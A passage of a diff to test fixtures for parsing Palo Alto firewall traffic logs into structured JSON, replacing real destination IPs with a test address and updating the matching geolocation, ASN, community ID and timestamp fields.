"192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -386,7 +389,7 @@ "destination": { "nat": { "port": 80, - "ip": "17.253.3.202" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -408,7 +411,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:VnGCPYRgvHZCFJBmPOwtCg7/sMY=" + "community_id": "1:JSXHhU7ufIJpIpsd+sxEq1u12as=" } }, "sequence_number": 32091114, @@ -428,8 +431,8 @@ ], "network": { "community_id": [ - "1:L9wP4JYo+V/38JhXYBMQf/hWYoQ=", - "1:VnGCPYRgvHZCFJBmPOwtCg7/sMY=" + "1:YZ7d7dfaV17GR6zb5Ykfbi10bg8=", + "1:JSXHhU7ufIJpIpsd+sxEq1u12as=" ], "transport": "tcp", "application": "web-browsing", @@ -469,14 +472,14 @@ ], "ip": [ "192.168.15.207", - "17.253.3.202", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:40:05.941791705Z", - "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031454100Z", + "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:09.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -499,27 +502,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -538,7 +543,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -553,7 +558,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -627,14 +632,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941795286Z", - "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031459500Z", + "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -657,30 +662,29 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.99" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0839, - "lat": 37.3861 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 1613, - "ip": "216.58.194.99", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -699,7 +703,7 @@ "packets": 5, "ip": "192.168.15.196" }, - "message": "192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -714,7 +718,7 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.99" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -736,7 +740,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:pvg9sIAzBs2eyqMclcdCIYEBO1Q=" + "community_id": "1:XJ9PhQOk/jmjsoXn6dQsdlduInU=" } }, "sequence_number": 32091116, @@ -756,8 +760,8 @@ ], "network": { "community_id": [ - "1:bfDHy9SG4Mhm/ohGXQNZR3yF5sI=", - "1:pvg9sIAzBs2eyqMclcdCIYEBO1Q=" + "1:M11jrJsZl7Ilam8qmRVtfDCAAx4=", + "1:XJ9PhQOk/jmjsoXn6dQsdlduInU=" ], "transport": "udp", "application": "quic", @@ -797,14 +801,14 @@ ], "ip": [ "192.168.15.196", - "216.58.194.99", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941798942Z", - "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031465Z", + "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -827,27 +831,29 @@ "destination": { "nat": { "port": 443, - "ip": "209.234.224.22" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 395162, + "number": 4837, "organization": { - "name": "Markit On Demand, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 21111, - "ip": "209.234.224.22", + "ip": "175.16.199.1", "packets": 51 }, "rule": { @@ -866,7 +872,7 @@ "packets": 62, "ip": "192.168.15.224" }, - "message": "192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -881,7 +887,7 @@ "destination": { "nat": { "port": 443, - "ip": "209.234.224.22" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -903,7 +909,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:u81/Ahz4HsL4LAVrUEiPkbXlX9A=" + "community_id": "1:z0M1RJ8MDRCMZUG5Vr95dQNeZuA=" } }, "sequence_number": 32091117, @@ -923,8 +929,8 @@ ], "network": { "community_id": [ - "1:A+0qkq/2rxZS/+I/sm0SFOWOkwY=", - "1:u81/Ahz4HsL4LAVrUEiPkbXlX9A=" + "1:8XhDd/299v16LAbX6rIvW94WUOw=", + "1:z0M1RJ8MDRCMZUG5Vr95dQNeZuA=" ], "transport": "tcp", "application": "ssl", @@ -964,14 +970,14 @@ ], "ip": [ "192.168.15.224", - "209.234.224.22", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 85000000000, - "ingested": "2021-09-08T12:40:05.941802525Z", - "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031470500Z", + "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -994,27 +1000,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -1033,7 +1041,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1048,7 +1056,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1122,14 +1130,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941806024Z", - "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031475800Z", + "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -1152,27 +1160,29 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.2.238" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 3732, - "ip": "172.217.2.238", + "ip": "175.16.199.1", "packets": 9 }, "rule": { @@ -1191,7 +1201,7 @@ "packets": 7, "ip": "192.168.15.224" }, - "message": "192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1206,7 +1216,7 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.2.238" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1228,7 +1238,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:DoBKpBbAds/XQwbKPGjMrcuHTGo=" + "community_id": "1:Gf6WAtpxRZADRPARoANhhnel+UM=" } }, "sequence_number": 32091119, @@ -1248,8 +1258,8 @@ ], "network": { "community_id": [ - "1:q1tj6dPFkb+U8mUSdFp3CbUFXUk=", - "1:DoBKpBbAds/XQwbKPGjMrcuHTGo=" + "1:4mNCXkF6149E9UPpN3Cw+1zKeQM=", + "1:Gf6WAtpxRZADRPARoANhhnel+UM=" ], "transport": "udp", "application": "quic", @@ -1289,14 +1299,14 @@ ], "ip": [ "192.168.15.224", - "172.217.2.238", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 15000000000, - "ingested": "2021-09-08T12:40:05.941809494Z", - "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031481100Z", + "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -1319,27 +1329,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -1358,7 +1370,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1373,7 +1385,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1395,7 +1407,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs=" + "community_id": "1:T5lRauQXneZw22xJbGrCiKA4dOY=" } }, "sequence_number": 32091120, @@ -1415,8 +1427,8 @@ ], "network": { "community_id": [ - "1:l1lEn2QIKjwJgww02PEndRveudE=", - "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs=" + "1:2J7SUgG1vsxw4i37iwcSTv8Oehg=", + "1:T5lRauQXneZw22xJbGrCiKA4dOY=" ], "transport": "udp", "application": "dns", @@ -1456,14 +1468,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941813199Z", - "original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031486600Z", + "original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:22.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -1486,27 +1498,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -1525,7 +1539,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1540,7 +1554,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1562,7 +1576,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ=" + "community_id": "1:SU+OmGVh/EDib8CmztQBWimJutE=" } }, "sequence_number": 32091121, @@ -1582,8 +1596,8 @@ ], "network": { "community_id": [ - "1:RK6Ut4Rb0DTrl9IRf27cop79UwI=", - "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ=" + "1:hL1V047KcxzlTjRlyOw0JDOTtoc=", + "1:SU+OmGVh/EDib8CmztQBWimJutE=" ], "transport": "udp", "application": "dns", @@ -1623,14 +1637,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941816740Z", - "original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031492100Z", + "original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:23.000-05:00", "timezone": "America/New_York", "kind": 